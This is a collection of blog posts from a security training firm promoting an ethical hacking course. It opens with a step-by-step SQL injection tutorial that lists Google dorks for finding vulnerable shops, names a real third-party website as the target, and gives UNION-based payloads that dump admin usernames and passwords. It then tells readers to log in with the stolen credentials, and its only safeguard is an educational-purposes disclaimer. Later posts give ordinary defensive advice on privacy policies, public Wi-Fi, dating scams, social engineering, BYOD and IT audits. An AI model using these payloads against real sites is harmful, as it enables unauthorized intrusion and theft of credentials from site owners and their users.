Before you launch any attack, you have to check the server to see how it responds to user inputs for authentication mechanism. Use the following queries to verify the users authentication mechanism:

 

 

 

 

// define POST variables
$Uname = $_POST[‘name’];
 $Upassword = $_POST[‘password’];

// sql query vulnerable to SQLi
$sql = “SELECT id from users where username = ‘Uname’ && password = ‘Upassword’ “;

// execute the sql query by database
database.execute($sql);

The codes above are vulnerable to SQL injection and the attacker can submit the malicious payload in the SQL query gain access to the web application by altering the SQL statement that is being executed.

One example of an SQL injection payload that can be used to set a password field is

Password’ OR ‘1’=’1’

where this condition is always true, the result of this query being run against the web server is

SELECT id FROM users WHERE username=’username’ AND password=’password’ OR 1=1’

What an attacker can do with SQL?

SQL is a programming language that is used to work with the relational database management systems. Like I said earlier, SQL’s can be used to delete, modify or update databases or columns, rows, tables within the RDBMS databases. SQL is one powerful language that can be used to attack databases and can be used by attackers to exploit databases of web applications, taking total charge of the application without the knowledge of the administrator.

Having said all this, let us see what an attacker can use SQLi to do.

  • It can be used to bypass authentication mechanisms or to impersonate a specific user
  • It can be used by an attacker to delete records from a database and even if an authorized backup plan is used, deleted data can affect the availability of an application until the database can be restored.
  • SQL’s can be used to select data based on a set of input queries which gives outputs of the query. It could allow the disclosure of data residing on the web server.
  • SQL’s can be used to alter or modify data in the database. And as you know when data is altered, the integrity is lost and issues regarding repudiation can come up such as voiding transactions, altering balances and other records.
  • The database of web servers are configured to allow the arbitrary execution of operating system commands. When are conditions are present, a malicious user can use SQLi to bypass firewalls and penetrate the internal network.

Using SQL Injection to Hack a Website

Now let us see how we can use SQL injection to hack websites

Step 1

The first thing is to search google for “google dorks”. I have gotten the following results from my search. You can as well search for yours.

about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=

This is just a few of the basic dorks that are available but you can also create your own dorks in order to find websites. These dorks can help you find out sites that are vulnerable to SQL injections in order to bypass the authentication.

STEP 2

Search google for SQL-vulnerable websites. Next thing is to open one of them to check if they can be vulnerable to SQLi’s.

I will use this website as an example.

http://www.tadspec.com/index.php?id=44

Now after you choose your link, make sure it is different from mine because there are many available sites.

Please note, that this practical session is just for educational purposes and therefore I do not in any way take responsibility for your actions.

Now lets check if the site I have chosen is vulnerable to SQL or not. This can be done by putting this code behind the URL

.php?id=44   (You can copy and paste it with an apostrophe (‘) at the end of that code.

If after you do this and you get a result like this;

  • “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1.”

Then bingo, then site is vulnerable an SQL injection attack. Therefore, we can go ahead to the next step.

STEP 3

In this step, we have to check the number of columns that are available on the database of the website. We can manually input these numbers, so we can check the columns;

http://www.tadspec.com/index.php?id=44 order by 32

 

Please note that the number “32” is an arbitrary number and it varies depending on the number of columns you may find. So, you have to make an arbitrary attempt to check the columns that are available on the database.

After putting “32”, this is what you get

Unknown column ‘32’ in ‘order clause’

And if we put the link below in URL,

http://www.tadspec.com/index.php?id=43 order by 31

This will redirect us to the website’s homepage which means that it is working correctly.

It therefore means that the number of the columns available on the database of this website is 31.

STEP 4

In this fourth step, we’re going to be determining the version of the database.

We will use the following query;

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,6,7,8,9,10,11-

When you run this query, you will get a number that shows boldly on your screen. Mine is 6. So, in the place of 6 in your URL, replace t @@version. This will give you the version that would give you the version of the SQL database that the website uses.

So, you have something like

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,@@version,7,8,9,10,11-

STEP 5

We will use the next query ‘group_concat(table_name)’ on the place of column#6 and some other string in the last part of the code.

So, its going to be like this;

http://www.tadspec.com/index.php?id=null union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11-from information_schema.tables where table_schema=database()-

Now the result of this query will be the names of the database tables. You can just copy them if you desire to use them for further analysis.

STEP 6

We will now try to find the column names in the database by changing the table to column in the fields.

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11-from information_schema.columns where table_schema=database()-

When you enter this query, the result you will get will be the names of the different tables that are present on this website.

STEP 7

Recall that in the previous step, we were able to get the names of the columns in the database so the next thing is to search for the column called “credential” because it can be used to retrieve sensitive data such as usernames and passwords. These are the columns that give access to the database.

Use this query to navigate there;

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11-from admin-

The group_concat() method was used to pass the username and then the 0x3a which is used for space and then the other column name. We removed the query and wrote admin table at the end of it and it means we are using the column names from the admin table.

If you have succeeded in this, then Congratulations you successfully performed an SQL injection.
Go ahead search the website login page and input those credentials in the fields present.

Please note that this tutorial is strictly for Educational purposes. We at SOUTECH are not responsible for your actions.

I have withheld some of the diagrams and pictorial explanations and if you must learn about them, enroll to our CEH course to learn comprehensively about this subject topic and more. Call us today.

 

Terms of Service: Do you ever read them? Stay Informed

Some people have a habit of not reading through the Terms of Service whenever they want to get a new application or buy a new device. I must let you know that this is a big mistake because most of the apps that are available in the market commonly known as graywares rely on you to get access to your personal information. The developers know that a lot of people do not read through the Terms and Service so they often include languages that are capable of authorizing a massive invasion of privacy. You may have noticed at the same time that most of the Terms and Services are just boilerplates. Now how do you read through a Terms of Service in order to find out what it is it as concerning privacy without having to waste a lot of time on reading standard terminology?

What are Terms of Service?

The Terms of Service commonly abbreviated as ToS is legal document b\used by websites and internet service providers (ISPs) that contain user’s personal information like social networking services and e-commerce.

Elements of Terms of Service?

A typical ToS contains the following

  • Definition of keywords and phrases and disambiguation.
  • Rights and responsibilities of the User.
  • Expected/proper usage or a potential misuse
  • Accountability for all online actions, conducts and behaviour
  • Outline of personal use also known as privacy policy
  • Details concerned with payments like membership or subscription fees etc
  • Policies for opting out-detailed procedures for opting out.
  • Arbitration carrying details of how the dispute is to be resolved and the extent of rights to take issues to court.
  • Notification of the user whenever any modification is made.

 

Privacy Policy

I mentioned privacy policy to be a key element of Terms of Service. Now I will shed some more light on privacy policies.

The area you really have to focus on when reading Terms of Service is the privacy policy because it is the aspect that handles security and integrity of your data. Every other information on the ToS is not really necessary as regards securing your data. Therefore, whenever you come across a typical ToS, just scroll to the part that has the privacy policy and start reading from there.

 

There is a second problem you may come across while reading through the ToS, which is the fact that the Terms of Service are usually written in legalese. This makes understanding some worth difficult even for people who are in the habit of reading such documents.

Let me teach you how to decipher the privacy policy document.

The first thing you must know is that every privacy policy basically has five parts:

  • Notice: This part basically is the most important part of the privacy policy. It tells you what information you will collect and how that information will be used. It describes the information practices.
  • Security: This is also another important part of the privacy policy in that it informs you on what the company is doing in order to secure the data that they have gotten from you. Possible security measures include: Administrative security, physical security and technical security.
  • Access and Correction: This is the part that details out who can access your data and who the data can be shared with and the circumstances.
  • Consumer choice: It provides an opt-out option as to how consumers may disclose their personal information to any unaffiliated third party agent.
  • Enforcement: This involves details out measures on how to enforce the privacy policy. This can be managed by the company or by a third party independent agent such as BBBOnline and TRUSTe to check for compliance to the privacy policies.

Please take note that every renowned and reputable organization desires that their privacy policy is transparent as much as it can be while also adhering to the letter of the law. But on the hand, there are companies that may want to take advantage of you and therefore will make their policies unnecessarily complicated.

Details to look for in a Typical Privacy Policy

Since there is a plethora of privacy policies for different companies readily available online, it can be however very difficult to streamline directly to what can be found on the privacy policy. However, these are a few things you can look out for

  • A comprehensive list of what kind of data is required from you. There are some kind of information organizations have to collect from you in order to make their products function for you. They always have to tell you what the type of data that should be collected from you.
  • A list of all the persons they are sharing information with and why they should share the information. The general language here will be vague such as third parties.

But under what circumstances should your data be collected from you? And do they only share this with companies that have security policies and is it done in the course of a normal business transaction?

Now, if there are not properly explained clauses as to who these third parties actually are and when they can share your personal data, then this can be a big warning signal for you.

  • The language of the privacy policy should be focused on how they are intending to protect your data. This will include a detailed explanation on how the data is stored. Now carefully look through for this part in the privacy policy. If it is missing then it is as well a good warning for you, go on and look for another or better still a competing piece of software or hardware device that performs the same function.
  • If you have any doubts, be sure to send an email to the customer service of the provider with all your questions clearly outlined. Reputable organizations or companies will normally and most likely answer all your questions promptly.

Sometimes the problem may not be that the company does not want to answer your questions or do they have an intention to do some nefarious with your personal data. It might just be that they are not taking seriously your internet security and privacy seriously enough. This can be just a type of lax security which sets you and them up for a major security breach.

As parting words, it is very important that you take a little time to read through licensed documents and terms of services. At least scroll through for a minute before checking the “i agree” box. Subscribe to learn our security course at SOUTECH Ventures where you will thought and equipped on things you need to know in order to become security conscious. Call us today to get a certification in CEH.

 

Just how safe are Public Wi-Fi’s?Stay protected- Soutech ventures

Having Wi-Fi readily available in public places has become a trend in larger cities of the world. Public places such as restaurants, coffee shops, libraries, hotel rooms, auxiliary offices, airports and other places you can think of have all adopted the use of Wi-Fi. Having a free and easily accessible internet connection to use can be a very convenient way of catching up with your work, meeting targets, accessing your online accounts, checking your mails etc. However, we seem not to know to the security risks associated with the use of publicly available Wi-Fi’s. Well, like you know already that one of best ways to optimally and speedily access your sensitive information and carryout sensitive transactions through Wi-Fi, there are some measures you need to take additionally in order to kept safe online which is the purpose of this write up.

According to a popular research journal published by Norton, said that over 68% people fell victim to publicly available and unsecured Wi-Fi’s in the last year. Therefore, we must take practical measures and efforts to make sure our devices are kept safe and protected.

Brief History in the encryption standard adopted by the Wi-Fi

Let me shade some more light on the encryption protocols and standards that existed before the encryption protocol adopted for use by Wi-Fi’s. One of the security problems faced by older encryption standards is in the aspect of security which was adopted by some wireless networks. One of the first encryption schemes for wireless network devices was the Wireless Encryption Protocol (WEP) and this encryption standard was found to be weak and very easy to crack. Although the WEP protocol is still regularly found as an option in many wireless access points and devices, there is need to give way for upgrading hardware that will be supported by newer standards whenever it is possible.

WEP was developed with the intention to manage the following;

  • To prevent eavesdropping in communications which aims at reducing any forms of unauthorized disclosure of data.
  • To ensure data integrity while it flows across the network.
  • Encryption of packets during transmission using a shared secret key.
  • To allow access control, confidentiality and integrity in a lightweight and efficient system.

However, WEP failed in handling some of these issues which birth WPA.

The Wireless Protected Access (WPA) came as a successor to WEP and was birth with the intention of checking and curbing the many issues faced by the WEP standard. This is the reason why its encryption abilities addressed some vulnerabilities however it was being found vulnerable and cracked. It was designed not to required full hardware upgrades as compared to the WEP.

However, its processing power and mechanisms were being limited especially where older versions of hardwares were involved. The TKIP standard was one of the standards developed to platform the WPA. TKIP was an improved standard for the WEP protocol because at every point there is a static and unchanging key being used for every frame transmitted.

WPA however suffered from the following flaws;

  • Weak key selection by users
  • Issues of packet spoofing
  • Issues with authentication as regards Microsoft Challenge Handshake.

This gave way to the WPA2 standard intended to address the flaws in WPA. WPA came with a stronger and tough encryption standard which are CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) and AES (Advanced Encryption Standard). It also employs the TKIP Temporary Key Integrity Protocol and MIC (Message Integrity Code) as encryption standards.

This enterprise is a version that incorporates the EAP standard as a medium to improve the strength of the security and also make the system scalable for use in large organisations and enterprises. WPA2 is special because it offers an improved security when compared over its predecessors and maintains the IEEE 802.11i standard for security. It uses a server to carry out its key management and authentication for its wireless clients.

The WEP, WPA and WPA2 all suffer serious vulnerability issues which an attacker can exploit in order to take advantage of the victim. All of them offer ways to be exploited in recent times.

Why Public Wi-Fi is Vulnerable to cyber attacks

Given all the risk associated with all the protocols described above, users still suffer a great deal from unknown and known flaws. The fact that you may need a password to log in to access the Wi-Fi does not mean that your activities online are encrypted and that a publicly available Wi-Fi is secure. There a few issues that make public Wi-Fi’s susceptible to attacks and one of the issues related to the encryption protocol which the Wi-Fi technology adopts. Another issue has to do with the possibility of connecting to a rogue Wi-Fi hotspot. Tools like Aircrack-ng have been built and are readily available online to perform brute force attacks on any weak passwords and keys involving WEP and WPA.

The risk of joining a rogue Wi-Fi hotspot is also a big issue when using free public Wi-Fi’s. All a hacker has to do is to create a rogue hotspot with the intention of unleashing a sort of Man-in-the-middle (MITM) attack on whoever becomes a victim by connecting to the rogue Wi-Fi. When this attack occurs, it allows a hacker to intercept the communication that goes on between you and the server of the website you are visiting at a time. There are pre-built tools that can be used to easily eavesdrop, capture sensitive information like login credentials, credit card numbers and social media security passwords etc. and monitor online traffic for performing MITM attacks

 

What are the signs that you may have logged on to a Rogue Wi-Fi?

Of course, you know that once a device discovers a Wi-Fi network it probes the known networks which an attacker can leverage on. An attacker can configure a rouge Wi-Fi hotspot which can look like a typical home network that can be found in a coffee shop. Therefore, your device can be connected to the hackers’ rogue Wi-Fi hotspot instead of connecting to the real publicly available Wi-Fi hotspot.

Another trick you should know is that, a public Wi-Fi network can be created with the name Free Wi-Fi which is flooded for victims to be connected to them and very naturally people will want to join such networks especially if the free internet service is offered. I must say I personally has been a victim to this a few years ago. If you are at a coffee shop, or at home or in a public place and suddenly your device shows you have been connected to your home network, there are huge chances that someone has been able to grab your devices’ or computers broadcast request. If also you are browsing a website or webpage such as your bank or favorite social media page that should normally be HTTPS instead it shows HTTP, then you must know that someone might have connected to your network. Once this person has linked up to your network, the person can perform a MITM attack by serving you a HTTP version of the site with the intention of capturing your login credentials. So, you must always be on the lookout these little details.

 

What are the Measures you can take to ensure your safety on a Public Wi-Fi?

  1. Accessing Sensitive information using public Wi-Fi: I will as a matter of fact always advice anyone never to use public Wi-Fi’s to access their sensitive information. If there is need at any point in time to access your sensitive data online, you need to switch you’re your local ISP or get someone to pretty much share their device hotspot with you. You can do use the public Wi-Fi to browse for things like directions and other things that are less sensitive like getting information from google, bing or yahoo. If you’re trying to process things like paying of bills or even shop online, these things can wait. If it is an urgent situation which you need to achieve, the use of a VPN (Virtual Private Network) is advised. There is a plethora of trusted VPNs online and obviously if you need a good service, then you need to pay for such VPNs. Ensure you choose a reputable VPN security provider.
  2. Use VPNs (Virtual Private Network): If there is a need to use a publicly available Wi-Fi to do your work and your company or organisation offers a VPN access, ensure to make use of it. VPNs provide a private tunnel for you to transmit or communicate by adding an extra layer of security for your connection.
  3. Visit HTTPS only: If you are using a public Wi-Fi, ensure to avoid websites that are HTTP (not protected or secure) and visit or browse websites that begin with HTTPS.

Why am I saying so, if you are an IT expert, you not, you must know that HTTPS are encrypted and provide an extra layer of security which makes browsing more secure. If you connect to an HTTP site which is unsecure, a hacker can easily see your traffic if he snoops around the network.

 

 

  1. Consider installing an extension such as HTTPS-Everywhere in order to re-route all the websites you visit to HTTPS. There is a tool offered by the Electronic Fronteir Foundation which provides this option.

2.Configure wireless settings on your device: Configure your device not to connect automatically to any available Wi-Fi hotspots. This can be done by navigating to the wireless settings of your PC or device. This setting makes sure your device does not automatically and unknowingly gets connected to any public network. On your PC, just turn off the “connect automatically” option. When you do this, you prevent your device from broadcasting to the world that it is attempting to get connected to the “home network” which a hacker can easily spoof.

  1. Use Privacy screens: Hackers are everywhere and are usually not afraid of using any means possible to access and obtain your data, you must consider making use of privacy screens if there is a need to access sensitive information in a public place.

In general terms, whether or not you are using a your smart-devices or PC’s to access some sensitive information like accessing your bank account and financial information, always ensure not to do it in a publicly available Wi-Fi network. Ensure to consider all the tips above to keep your information protected online.

Soutech ventures offers a comprehensive information security course such as (CEH and CISSP) which can give more security insights, tools/tips and countermeasures in the different facets of technology. Subscribe to our services today.

Certified Ethical Hacking Training in Abuja,Nigeria

Online Dating: Protect your privacy online-SOUTECH Cyber security Tips

In the past 3years, Nigerian singles have flocked dating sites and took to social media to employ their services in searching for partners. Online dating has outgrown all the stigma it used to have in the past as a research by psychologist and counsellors have found that one out of ten Nigerian single person has veered on to social media and online dating sites on their mobile apps and PC’s to get hooked up with people. Since the negative stigma attached to the online dating has gradually been phased out and nearly going into extinction, the popularity of these services has been on the rise and has caught the attention of hackers and scammers.

Recently in Nigeria, a lot of hackers and scammers have taken to social media platforms to trick people into giving sensitive and personal information. I have a made a personal study on this and from reading experiences from people and it has become of concern for me the reason behind this article. Apart from phishing scams and other vices that hackers have adopted to take advantage of unsuspecting victims, online dating has become one of the tools of meeting the emotions of people to exploit them.

The intention of this article is not to talk about dating and online dating or its sort but to give you tips on how to protect your privacy online.

Privacy Protection Tips

Creating of new user accounts

Create a username different from any other account that you have ever had and used. Now you may be wondering why you should do this, this is because a username can be searched easily and any account related to it, so this is the reason why you usually need a totally different account.

Images and photos uploaded

The same applies to photos and the images that you post on your social media profiles. You should try as much as possible to make sure that any reverse image searches performed on you will not work.

Opening Email accounts

Ensure to setup a free email account to use on the dating accounts with a unique name. Note that most sites provide features that offer users anonymity protection via their own in-site messaging products.

Using Free Google voice accounts for Calls

If you must do a phone call, open a free google voice account that will generate a different phone number for you and then go ahead to forward it to your mobile. By doing this, you have been able to secure your phone number that will enough to give you your potential match.

Use Reputable Online Dating sites

Always research properly and subscribe to popular and reputable online dating sites if you must use them. You can either delete or disable an account which come sites actually allow you. And since the site retains your previous information, you can always return to the online dating sites whenever.

Check website privacy policies

Ensure to check the sites privacy policies and try to verify how information with these sites are being handled. Some of these sites by default make profile pictures and profiles public which can be easily indexed by any search engine. There is a popular website that was penalized recently for secretly trying to experiment with their user’s data.

The fact that users have to pay to use their services for communication, this has reduced the rate of scammers and illegitimate daters. Note that some of these sites perform background screenings for criminals.

How can online dating scams be spotted?

Now that you have known some of the do’s and don’ts of the social online dating sites, now I will teach us how to spot any form of scams that you may be exposed to know.

  • I have heard people say someone comes up to them with some stories to get to their emotions. Now this is one popular trick by scammers in that an individual can add up and start giving you some sad stories like “ I am stranded in a foreign country at the moment, my family has an emergency and needs immediate attention”. The endpoint of this story is request for some amount of money from you. Once you see this, immediately report such accounts to the service and do well to block such.
  • Another trick I apply is to request a recent photo of the person I am chatting with in order to verify their identity. If in anyway they come up excuses or start a sort of protest as to the know why they won’t be able to provide the photo, the best thing to do is to run for safety and apply caution at once.
  • If you been chatting with and familiarizing a supposed sweetheart for some time and you observe that they avoid any real-life meetings and dates, this could be a warning signal to take note of.
  • Do not click open any links that is sent to you by anyone you have not been chatting or communicating with as well as from the ones you’re in frequent chats with. A scammer can appear to be a contact and try to get you to click the links which may redirect you to a pornographic site or webcam site and even malware infected sites.
  • Be careful about your behavior and your outfit if you want to engage in any sort of webcam or video chat. A criminal will want to record these sorts of sessions in order to blackmail you with it. You can disconnect from any form of communication or chat sessions that makes you uncomfortable.
  • Scammers use bots to create fake profiles that run their accounts with the aim of getting you to click these links that redirect you to unwanted sites described above. Some of them can even be programmed to steal your credit card information. Well, you can easily spot a bot because they are programmed to give out a set of predetermined responses. When you observe that you are not getting direct replies to your conversation, then there are chances that a bot has been set in.

CatFishing

The term catfishing is a scamming trick in which a user takes the identity of another person. This scamming has been adopted by scammers and cyber criminals to lure people into online romantic relationships and friendships.

A typical catfisher will always come up with excuses as to why they can’t have dates, call you in phone or even do video and webcam chats. It probably is true if the user’s profile appears too real that a lie. What you can do is to perform a reverse online image search of their photo and if they seem to be a place which is different from the one showing in their profiles then congratulations you have been able to catch a catfish.

As a parting word, we are in the age and era of the internet where we can order just anything from online. And as it is in all facets of life to have scammers and tricksters, scammers and hackers are in strong search of loopholes to exploit online users. But I have and will always do my bit in keep u appraised with all the techniques they can possibly come with to trick you. All you have to do is subscribe to all the tips I have given out in this article and you can safely be online and keep your relationships going on just fine.

Subscribing to our CEH course in Soutech ventures gives you an added edge to stay one step ahead of hackers and cyber criminals all over the world.

 

What is Social Engineering? Protect Yourself and Organization from all forms of Social Engineering-SOUTECH Nigeria

Vulnerabilities in softwares have been widely discussed and looking at it from the human perspective, human emotions play a large part. Anytime someone is faced with a scary or frightening scenario, their first reaction to it matters a whole lot.

Social engineers leverage on this type of vulnerability to launch successful attacks on victims. I am going to discuss in details what social engineering is all about and its different forms as this particular vulnerability stands at 80% when it comes to the techniques which cybercriminals perpetrate attacks.

What is Social Engineering?

Social engineering is a technique whereby cybercriminals make use of human interactions to trick users into giving out sensitive information such as personal credentials.

Types of Social Engineering

The fact that social engineering leverages on the human nature and emotions to perpetrate, attackers have deployed many techniques to trick users both online and offline. Here are a few techniques you should know about;

Phishing:

Phishing is one of the oldest cyber tricks and has been grown to be one of the most popular most successful means of exploiting computer users. In phishing, cybercriminals usually attempt many tricks and methods to get information from you. Recently, they have resorted to using scare tactics which can come in form of an urgent situation which requires your attention usually having to do with your banking details or your other online accounts. Users therefore will have to make decisions based on fear and how they feel at the time the scenario is simulated.

Emails that seem to be from a legitimate authority such as your financial institution or your company will be sent to you requesting your username or password in order to get login access. Normally, people tend to react to when issues involving their finances or jobs are involved especially when it appears to come from a higher management. I will reiterate that one major phishing tactic is in the sense of urgency applied to these messages.  I have written comprehensively on the forms and techniques of phishing so you can look it up. Read more on phishing

Baiting

Now let’s look at this technique which involves cybercriminals leaving a malware-infected USB or external devices in a public or open place. They leverage on the curious nature of humans such that when someone out of curiosity picks up this device and plugs it onto their computer systems in order to see what information is on it. Once they do this, the malware automatically gets injected into their computers.

Pretexting

In pretexting, the cybercriminal fabricates some very emotional stories and scenarios that tend to get to the emotions of their victims. Sometimes the stories can come in form stories of being stranded in a foreign country and sometimes can be that they are princes or princesses in their countries and their Father just passed away. They then try to tell the victim to please help them with a sum of 500USD or more in order to take back the throne. Like I said, these type of scenario tends to get to the emotions of victims who may always want to help. Pretexting is used alongside other methods as most of the techniques are targeted towards getting to the emotions of the victim or the cybercriminal attempts to impersonate someone on the telephone.

Hacking Emails and Spamming of Contacts

It is in the human nature to be inclined towards the affairs of their family and people they seem to know. For example, if my brother sends me an email message that comes with a subject that says “Look up this website, you may find something of interest” I normally wouldn’t resist checking it out by clicking open. Now this is the reason why a cybercriminal will try to leverage on this technique by using emails addresses and passwords. Immediately the victim’s personal credentials are obtained by the cybercriminal, they are take total control of the users account and will further more spam all the contacts that are on the users’ list. Always remember that the main objective of this attack vector is to spread malware with the desire of tricking people into giving out their personal data.

Vishing

This technique of all the methods mentioned so far and beyond involves the most of human interactions. In vishing, the cybercriminal puts a call through to an employee of an organisation faking to be a trusted individual to the organisation. They can pose to be a representative from the bank or other highly profiled company’s related to the organisation of the victim proposing to do a business with them.

Their aim is to try to get as much information as possible from the victims. They can even pose to be a fellow employee with a lost or misplaced password and request for their passwords and may try to sound legitimate by asking questions to verify the identity of the victim.

Quid Pro Quo

This is also referred to as something-for-something. This technique involves attempting to entice users with winning prizes, products or getting discounts on purchase of expensive products. This scam is fashioned such that the users can only get something only after they have completed a form which requires mostly your personal data. The information gathered can then be used to perpetrate other attacks such as identity theft etc.

Spear Phishing

This is a technique that is related largely related to phishing and can be referred to as phishing’s complex cousin. In spear phishing, the cybercriminal targets the employees of an organisation and does some reconnaissance on them online with the aim of getting personal information.

Information can be gotten from internet searches and social media platforms via profiles. Once they have been able to get details personal to them, they can then start sending emails that may seem very necessary and of interest to them in order to entice them. Such that once they click the links sent to them, the malware file attached can be downloaded to their system. Once the cybercriminal successfully tricks the user, the malware is installed on the user’s computer which can be spread throughout the network to other computers on the company network.

Farming

This is more like a long-con where the cybercriminal tries to establish a relationship with a target. They usually go through their targets social media profiles in order to establish a relationship and gather as much as information that will help them perform an attack.

This attack form typically depends on pretexting because the attackers aim is to have prolonged conversations with the target in order to extract as much information as possible.

Hunting

This is a shorter version of all the attack forms. The cybercriminal will typically use baiting, phishing and email hacking to extract information from a chosen target passively (i.e. with no direct contact or with little interaction as possible).

Social engineering has taken over all forms, both online and offline and therefore has become very difficult to control or cut off its threats. Therefore, your best defense mechanism against social engineering is to educate yourself and your employees if you run an IT-driven organisation. You should also be aware and lookout for any possible attack methods that may come.

We have a comprehensive course that can help you learn more on how to protect yourself from social engineering and other attack forms. Subscribe to our CEH course today in SOUTECH.

Setting up a Bring-Your-Own-Device (BYOD) policy for your Organization- Be Cyber-safe-SOUTECH

In a recent survey by Symantec, it said that about three to four small and medium-sized organization owners have adopted smartphones and tablets as a core part of achieving their teams’ success. Since the use of these devices are gradually expanding, therefore there is a need to provide an apt security for them. This is the main reason why organizations have adopted the bring-you-own-device concept an approach that is commonly referred to as BYOD.

The fact that smartphones and tablets have grown into consumer markets have made a lot of employees choose employ the Bring-Your-Own-Device concept to their places of work. So, I’ll be giving you a few tips on how to stay protected on the internet as mobile devices have become a core entity in many organizations.

Therefore, the idea of developing a sound and efficient BYOD policy that can assist in gaining a maximum productivity in your organization or your company.

These are a few things I will buttress on this point which are the necessities for every organization;

1.Assessing the needs of Your BYOD 

One of the key things you can do is to brief or engage your employees and staff in talks regarding the use of their devices in the organization for business transactions. The things you need to find out are;

  • Do they access the company server and read emails related to work or the business?
  • What operating systems and the devices they employees use in order to access their network?

This information will guide your policies and help you to dictate the scope of your policies and the measures you can take to secure your devices. It can also help you to in making choices of the security softwares you can deploy to protect their devices.

2. Always Educate Your Employees

Endeavour to talk to your employees and team members on the potential risks of using mobile devices in and out of the office including the importance of managing these any related risk. It must be made compulsory for employees to follow security best practices, which include:

  • Employing the use of complex passwords for their devices and for any program that is related to work which are accessed using those devices.

                                 

These passwords can be set by navigating through the device’s settings. Learn more about creating strong passwords.

  • Employing a regular password changing policy. For example, changing passwords quarterly or every 90days. You can use password manager services like KeePass or LastPass which is capable of helping employees manage multiple and regular password changes.
  • Always ensuring that system updates and app updates are done once the device prompts for them. This is done in order to protect against any possible security vulnerabilities.
  • Being on the lookout for phishing text messages and emails which can be avoided by avoiding to click on such links that prompt them to download files and documents from unknown pages.
  • Doing a thorough research on applications before having to download them unto devices. Employees should be discouraged from downloading applications from unofficial or third-party app stores.

3. Strong Protective measures must be implement

Products that will assist employees to build their strength and ability of their devices when used for business should be explored. A very good tool is the Norton Small Business software that performs the function of protecting mobile devices against malwares associated with mobiles.Research has had it that many devices running on Android platforms carry potential malwares and privacy loopholes and greywares which are capable of hindering productivity. However, there have been new products that provide more security including remote locate and lock and wipe features. These features allow mobile users to manage their device security from a central web portal. Consider using a VPN (Virtual Private Network) service if the employees access the company’s network remotely with their mobile devices. A VPN creates a tunnel that is encrypted in the internet which allows traffic to pass through it. There are mobile apps that allow users to connect to a VPN via their mobile devices or smartphones.

4. Acceptable Use should be properly defined

Guidelines should be outlined to clarify and define how employees can use their devices during business hours for business purposes. For instance, you may employ a pervasive policy by allowing your team members to access documents and emails, but prohibiting them having access to sensitive files such as financial data. Websites and apps that are prohibited from accessing with the company VPN during work hours should be specified.

5. Decide how these Guidelines are Enforced

Setup due consequences for any member of your team who goes against any of the outlined policies. Measures could be that if anyone accesses those prohibited apps or softwares during business hours it could result in warning and if anyone downloads or stores confidential files from a malicious app, such persons will not get funding for their mobile devices.

These measures should be outlined clearly with how any potential violations will be handled.

If you run a business or an organisation that encourages the BYOD policy, thinking through these steps and few tips should be able to guide you through building a firm foundation and an effective way to manage your infrastructure and protect it from any possible security breaches.

You can learn about a lot of more tips on how to better manage your infrastructure along proper auditing skills from SOUTECH ventures. We offer the best IT consulting solutions to our clients in Abuja, Lagos and Port Harcourt. Subscribe to our Ethical hacking course and learn more.

 

Understanding the importance of an IT audit: SOUTECH Ethical hacking tips

An IT audit is an audit that deals with the review and evaluation of all automated and non-automated information processing systems and all the interfaces that it encompasses. It also includes setting up management controls for information technology and infrastructures.

The elementary function of IT audits includes, evaluation of systems that are already in place to guard the organization’s information. It looks into the ability of an organization to protect its assets as well as be able to legitimately and adequately give out information to authorized parties.

The process of planning IT audits involves two key steps

  • Gathering information and planning
  • Gaining an understanding of the already existing internal control structures

Many organizations are gradually phasing towards the approach of risk-based audits which is used for risk assessment and to help the IT auditor to decide on whether to carry out a compliance and substantive test. The risk based approach involves the IT auditors relying on the internal and operational controls and also the knowledge of the organization involved.

However, this type of decision as regards risk assessment can go a long way to relate the profits analysis of the control to the risk.

These are the 5 aspects that an  IT auditor needs to identify when gathering information:

  • Good knowledge of the business and industry
  • Previous results obtained from all the years
  • Recent financial data
  • Already existing standards and policies
  • Inherent risk assessments

Inherent risk here refers to the risk that there is an error that could be a function of combined errors that are encountered during this audit assuming there are no controls in place.

Once the auditor has gathered relevant information and has an understanding of the control, then they are ready to start planning or select areas that need auditing.

Why is it important to do an IT Audit?

Hardly will you find an organization in recent times that is not IT driven. A lot of organisations today are investing huge amounts of cash on their IT infrastructure because they have come to realize the tremendous importance of using IT in their business services and operations. As a result of this, they need to always make sure that their IT systems are very secure, very reliable and is not susceptible or vulnerable to any form of cyber attacks.

The importance if an IT audit can never be over emphasized because it provides the assurance that the IT systems deployed by the organization is well protected, is available at all times, properly managed to get the required results and that it gives out reliable information to users. Many people use and rely on IT without knowing how it works and that a computer can make errors repeatedly and incurring extensive damages than a human being can. An IT audit is also very important in reducing risk of data leakage, data losses, service disruptions and ill-management of an IT infrastructure.

The Objectives of an IT audit

The objectives of an IT audit often focus on substantiating that the existing internal controls and are functioning as expected in order to minimize business risk. The objectives include

  • Assuring compliance with legal and regulatory standards
  • Ensuring confidentiality
  • Ensuring Integrity
  • Improving availability of information systems

